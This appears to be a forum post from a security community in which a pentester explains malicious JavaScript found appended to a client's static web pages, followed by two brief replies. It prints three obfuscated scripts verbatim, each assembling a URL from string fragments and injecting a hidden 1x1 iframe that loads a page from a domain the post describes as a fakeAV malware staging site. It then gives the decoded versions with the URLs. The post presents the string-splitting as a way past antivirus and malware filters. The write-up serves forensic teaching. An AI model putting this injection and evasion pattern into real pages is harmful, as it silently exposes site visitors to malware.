EH-Net

Good morning, all!

For those who are newer to pentesting / forensics, or for those who just like to keep tabs on what goes on in the wild, I thought I'd writeup a quickie of the little javascript I found, during a pentest, the other evening.  Now, this is no major, "heavy-duty" code, nor is it very complicated.  But it goes to show how even simple tricks can get you past both host- and server-based antivirus scans, malware detection utilities, etc.  

So without further adieu, here's the skinny!

I was asked to go into a company and forensically help them find why they were being flagged by Google and safeSearch.  Then, once I found the issue, pentest their webservers, to see if I could determine how the problem got there, to begin with.

I won't go into full details on the pentest, but suffice to say the company's "static" html homepage, which they assumed was safe, was in a subfolder to one of their OTHER domains, on the same hosting provider's server.  The other domain had php vulnerabilities, which would allow an attacker full access, to all folders beneath that level.  (ie - OOPS!)  So it was an easy task, by an attacker, to manipulate the website.

Anyway, pentest aside, the issue I found on their static html pages was a rather simplistic one.  There were 3 javascripts appended to the bottom of each page.  The javascripts each pointed out to sites known to be staging points for the 'fakeAV' malware, and thus, their site got flagged.

The javascripts are below.  I first found them by running BURP to watch the calls from the website, as I traversed the pages, then once I spotted the referring page on the customer site, I looked at the source code.

SCRIPTS (as they appeared in the page source, looking suspicious to anyone with half-a-clue, but otherwise, not obviously malicious to a normal person):

<script>ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';
xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';
sb='rc';f='ame';l='://';b=yn.concat(f);gg=xm.concat(sb);
qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');
xp.setAttribute('height','1');xp.frameBorder=0;
xp.setAttribute(gg,qt);document.body.appendChild(xp);</script><script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';
vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';
t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);
oz=v.concat(k);
db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);
var ip=document.createElement(se);
ip.setAttribute('width','1');ip.setAttribute('height','1');
ip.frameBorder=0;ip.setAttribute(oz,db);
document.body.appendChild(ip);</script><script>ez='://';la='k9';vp='85y';ma='zi.';s='c';f='m';kg='cub';
i='t';zz='/';l='sr';n='c';ng='ame';rv='.ht';gn='om';h='ht';
tg='v';vl='tp';kf='ni';v='ifr';vq='yfo';bc=v.concat(ng);
x=l.concat(n);p=h.concat(vl,ez,kg,vq,kf,ma,s,gn,zz,la,vp,i,tg,rv,f);var jc=document.createElement(bc);
jc.setAttribute('width','1');jc.setAttribute('height','1');
jc.frameBorder=0;jc.setAttribute(x,p);
document.body.appendChild(jc);</script>


I reorganized the source (as I'd seen it through BURP) to be more readable for each script instance, and decoded them, below, so that you can follow the script logic.  

Note how each one simply creates a 1x1 iframe, pretty much hidden from view, that calls for the malware from the given site.


********************************************

09:15:50.105

Script: http://<company I tested>.com/
Line: 229

ti = ".c";
ai = "af";
qo = "p";
jn = "htm";
rf = "n";
tf = "doz";
yn = "ifr";
xm = "s";
cl = "o";
jd = "k9";
nn = "tv.";
rl = "85y";
r = "umu";
eh = "m/";
ec = "htt";
sb = "rc";
f = "ame";
l = "://";
b = yn.concat(f);
gg = xm.concat(sb);
qt = ec.concat(qo, l, rf, r, tf, ai, ti, cl, eh, jd, rl, nn, jn);
var xp = document.createElement(b);
xp.setAttribute("width", "1");
xp.setAttribute("height", "1");
xp.frameBorder = 0;
xp.setAttribute(gg, qt);
document.body.appendChild(xp);


BECOMES:

var xp = document.createElement(iframe);
xp.setAttribute("width", "1");
xp.setAttribute("height", "1");
xp.frameBorder = 0;
xp.setAttribute(src, http://numudozaf.com/k985ytv.htm);
document.body.appendChild(xp);

********************************************

09:15:50.129

Script: http://<company I tested>.com/
Line: 229
 
wa = "t";
p = "ht";
f = "k98";
tb = "ame";
bg = ".";
v = "sr";
g = "tp:";
vf = "/z";
bs = "t";
px = "v.h";
br = "yt";
k = "c";
yr = "m";
ds = "m";
ej = "/";
au = "/";
t = "com";
sp = "ifr";
r = "ca";
cp = "y";
wz = "ir";
wf = "u";
b = "5";
se = sp.concat(tb);
oz = v.concat(k);
db = p.concat(g, ej, vf, wz, cp, r, bs, wf, yr, bg, t, au, f, b, br, px, wa, ds);
var ip = document.createElement(se);
ip.setAttribute("width", "1");
ip.setAttribute("height", "1");
ip.frameBorder = 0;
ip.setAttribute(oz, db);
document.body.appendChild(ip);

BECOMES:

var ip = document.createElement(iframe);
ip.setAttribute("width", "1");
ip.setAttribute("height", "1");
ip.frameBorder = 0;
ip.setAttribute(src, http://zirycatum.com/k985ytv.htm);
document.body.appendChild(ip);

********************************************]

09:15:50.149

Script: http://<company I tested>.com/
Line: 229

ez = "://";
la = "k9";
vp = "85y";
ma = "zi.";
s = "c";
f = "m";
kg = "cub";
i = "t";
zz = "/";
l = "sr";
n = "c";
ng = "ame";
rv = ".ht";
gn = "om";
h = "ht";
tg = "v";
vl = "tp";
kf = "ni";
v = "ifr";
vq = "yfo";
bc = v.concat(ng);
x = l.concat(n);
p = h.concat(vl, ez, kg, vq, kf, ma, s, gn, zz, la, vp, i, tg, rv, f);
var jc = document.createElement(bc);
jc.setAttribute("width", "1");
jc.setAttribute("height", "1");
jc.frameBorder = 0;
jc.setAttribute(x, p);
document.body.appendChild(jc);

BECOMES:

var jc = document.createElement(iframe);
jc.setAttribute("width", "1");
jc.setAttribute("height", "1");
jc.frameBorder = 0;
jc.setAttribute(src, http://cubyfonizi.com/k985ytv.htm);
document.body.appendChild(jc);

********************************************

As you can see, nothing too 'heavy-duty,' but this is an example of how even simple code manipulation can go a long way in bypassing filters, AV and malware detection.

Cool pretty interesting.

my python learning is paying off and my programming knowledge is leaking back into my brain, I actually had a feeling that was what was being done right in your code dump section :D 

But yeah, that is sneaky.  Very simple, but obviously effective.